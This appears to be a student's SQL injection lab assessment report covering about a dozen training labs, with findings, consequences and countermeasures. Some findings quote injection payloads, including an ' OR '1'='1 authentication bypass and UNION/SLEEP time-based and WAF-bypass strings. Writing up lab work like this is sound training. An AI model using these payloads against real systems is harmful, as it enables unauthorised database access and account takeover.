Professional Documents
Culture Documents
Introduction
This report document hereby describes the proceedings and results of a Black Box security
assessment conducted against the Week 9 Labs. The report hereby lists the findings and
corresponding best practice mitigation actions and recommendations.
1. Objective
The objective of the assessment was to uncover vulnerabilities in the Week 9 Labs and
provide a final security assessment report comprising vulnerabilities, remediation strategy
and recommendation guidelines to help mitigate the identified vulnerabilities and risks
during the activity.
2. Scope
This section defines the scope and boundaries of the project.
3. Summary
Outlined is a Black Box Application Security assessment for the Week 9 Labs.
4 4 4
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
Generic SQL Injection Payloads
How It Was Discovered
Automated Tools and manual basic SQL payload injection in given parameters
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_1/lab_1.php
Consequences of not Fixing the Issue
Can lead to user’s credential leak and account takeover
Suggested Countermeasures
Input sanitization both in input parameters and URLs
References
https://drive.google.com/file/d/1fOVWwPEWJr7mp6zFys2Tad8SrDcyNHQM/view
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
1.2. Strings & Errors Part 2!
Reference Risk Rating
Strings & Errors Part 2! Low
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
Generic SQL Injection Payloads (commenting)
How It Was Discovered
Automated Tools and manual payload: id=1#
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_2/lab_2.php
Consequences of not Fixing the Issue
Can lead to Database exploitation, user’s data/credential leaks.
Suggested Countermeasures
User input sanitization and filtrationDatabase
References
https://drive.google.com/file/d/1fOVWwPEWJr7mp6zFys2Tad8SrDcyNHQM/view
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
Generic SQL Injection Payloads
How It Was Discovered
Automated Tools and basic SQL query payload
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_3/lab_3.php
Consequences of not Fixing the Issue
Can lead to user’s or admin’s data expose
Suggested Countermeasures
User input sanitization on URL
References
https://owasp.org/www-community/attacks/SQL_Injection
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
Generic Error Based Payloads
How It Was Discovered
Automated Tools and payload: ' OR '1'='1 both in the email and password section.
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_7/lab_7.php
Consequences of not Fixing the Issue
Auth bypass, credential expose, sensitive data retrieval and account takeover
Suggested Countermeasures
Proper Input sanitization and validation and restricting the malicious SQL queries
References
https://portswigger.net/web-security/sql-injection
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
SQL injection using UNION
How It Was Discovered
Automated Tools and payload of UNION to retrieve data of different ids in User-Agent section
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_8/lab_8.php
Consequences of not Fixing the Issue
Sensitive data retrieval and credential leak and further account takeover
Suggested Countermeasures
Proper Input sanitization in the input section as well as the User-Agent section and restricting the
malicious SQL queries to run.
References
https://portswigger.net/web-security/sql-injection
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
SQL injection using UNION
How It Was Discovered
Automated Tools and payload of UNION to retrieve data of different ids in Referrer section
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_9/lab_9.php
Consequences of not Fixing the Issue
Sensitive data retrieval and credential leak and further account takeover
Suggested Countermeasures
Proper Input sanitization in the input section as well as the Referrer section and restricting the
malicious SQL queries to run.
References
https://owasp.org/www-community/attacks/SQL_Injection
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
1.10. Oh Cookies!
Reference Risk Rating
Oh, Cookies! high
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
Time-Based, error-based and blind SQL injection
How It Was Discovered
Automated Tools and payload: %27UNION%20ALL%20SELECT%20@@VERSION,USER(),SLEEP(5)--
%20
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_10/lab_10.php
Consequences of not Fixing the Issue
Sensitive data retrieved (version, localhost, password), time delay, account takeover, and further
privilege escalation and server and database takeover.
Suggested Countermeasures
Proper input sanitization in all input parameters and as well as in cookies, proper session time out
and cookie clear, restriction malicious query to execute.
References
https://github.com/payloadbox/sql-injection-payload-list and https://portswigger.net/web-
security/sql-injection/blind
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
Time-based and WAF bypass Blind SQL injection
How It Was Discovered
Automated Tools and payload: ?id=2%27UNION%20SELECT%201,2,SLEEP(5)--%20-
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_11/lab_11.php
Consequences of not Fixing the Issue
WAF bypass, User or admin credential leak, time delay and blind SQL injection, leading to RCE
Suggested Countermeasures
Proper Input sanitization in every input section and rebuilding WAF, blacklisting all malicious
queries and restricting them to execute
References
https://github.com/payloadbox/sql-injection-payload-list and https://portswigger.net/web-
security/sql-injection/blind/lab-time-delays
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab
Tools Used
Burp suite & SQLi payloads
Vulnerability Description
Time-based and WAF bypass Blind SQL injection
How It Was Discovered
Automated Tools and payload: ?id=2")%20union%20select%201,sleep(5),8--+
Vulnerable URLs
https://www.bugbountyhunter.org/internship_labs/HTML/sqli_lab/lab_12/lab_12.php
Consequences of not Fixing the Issue
WAF bypass, User or admin credential leak, time delay and blind SQL injection, leading to RCE
Suggested Countermeasures
Proper Input sanitization in every input section and rebuilding WAF, blacklisting all malicious
queries and restricting them to execute
References
https://github.com/payloadbox/sql-injection-payload-list and https://portswigger.net/web-
security/sql-injection/blind/lab-time-delays
Proof of Concept
This section contains the proof of the above vulnerabilities as the screenshot of the
vulnerability of the lab